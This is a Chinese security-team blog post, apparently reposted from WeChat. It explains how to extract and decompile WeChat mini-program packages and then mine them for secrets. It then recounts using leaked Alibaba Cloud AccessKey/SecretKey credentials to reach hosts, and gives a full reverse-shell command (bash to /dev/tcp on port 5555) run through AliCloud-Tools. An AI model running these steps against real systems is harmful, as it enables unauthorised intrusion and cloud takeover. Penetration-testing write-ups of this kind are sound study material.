【干货分享】五分钟教你挖掘小程序漏洞
2022-11-4 17:32:54 Author: 戟星安全实验室(查看原文) 阅读量:21 收藏

戟星安全实验室

    忆享科技旗下高端的网络安全攻防服务团队.安服内容包括渗透测试、代码审计、应急响应、漏洞研究、威胁情报、安全运维、攻防演练等

本文约1252字,阅读约需5分钟。

前言

现在大多小程序反编译教程所使用的都是node.js,操作过程较为麻烦,那有没有简单好用的工具呢?有!

准备工作

一个模拟器,这里用的是夜神模拟器(模拟器开启root权限)。登录微信,打开小程序首页:

然后再打开文件管理器,找到路径:

/ 根目录下的data/data/com.tencent.mm/MicroMsg

在此目录下会有一个md5加密的文件夹。(如果打开微信小程序过多,同时有多个文件夹不容易识别的情况,可以选择把MicroMsg文件夹所有内容删除掉,再去重新打开微信小程序,就会得到唯一一个MD5加密命名的文件夹)

在该文件夹下的appbrand/pkg目录下找到.wxapkg后缀结尾的文件,其中只有几MB大小的为刚刚打开的小程序的文件。(该文件夹中文件过多也可以清空后,再打开小程序方便识别)

通过模拟器的共享文件将其传到物理机上。然后打开我们的工具(wxapkg-convertor)

将小程序的wxapkg文件直接拖入这个图标中,稍等片刻就可以看到目录下多了一个文件夹,此文件夹就是反编译好的小程序。使用VScode打开

正则查找API

挖洞实战

反编译成功后,查找api接口和敏感信息,定眼一看,在配置文件中,发现了AK/SK

先使用行云管家在线工具,输入AK/SK检索区域的主机个数,大概有6台主机(因之前没有截图,只能靠回忆),可以连接成功的只有4台主机,一台公网服务器,三台内网.

最后利用AliCloud-Tools工具反弹shell,阿里云服务器上监听5555端口,同时要确保安全组中的配置规则开放5555端口。

 执行反弹shell,将目标主机的shell反弹到自己的服务器上:

./AliCloud-Tools -a AK -s SK ecs exec -I 实例ID -c "bash -i >& /dev/tcp/服务器IP/5555 0>&1"

 阿里云服务器接收到反弹shell会话

项目地址

wxapkg-convertor:https://github.com/ezshine/wxapkg-convertor

alicloud-tools:https://github.com/iiiusky/alicloud-tools

往期回顾

【干货分享】使用selenium实现异步流量获取和反爬处理
【干货分享】Swaks+163邮箱邮件伪造
【奇技淫巧】教你零成本拥有高匿C2

声明

    由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,戟星安全实验室及文章作者不为此承担任何责任。

    戟星安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经戟星安全实验室允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

戟星安全实验室

# 长按二维码 || 点击下方名片 关注我们 #


文章来源: http://mp.weixin.qq.com/s?__biz=MzkzMDMwNzk2Ng==&mid=2247504785&idx=1&sn=3130522aefeecf572c487389667c9190&chksm=c27ed980f5095096d3c03e4e60f3f9967d5687ea77d42320f83bde658da96a84f4d8abe67e82#rd
如有侵权请联系:admin#unsafe.sh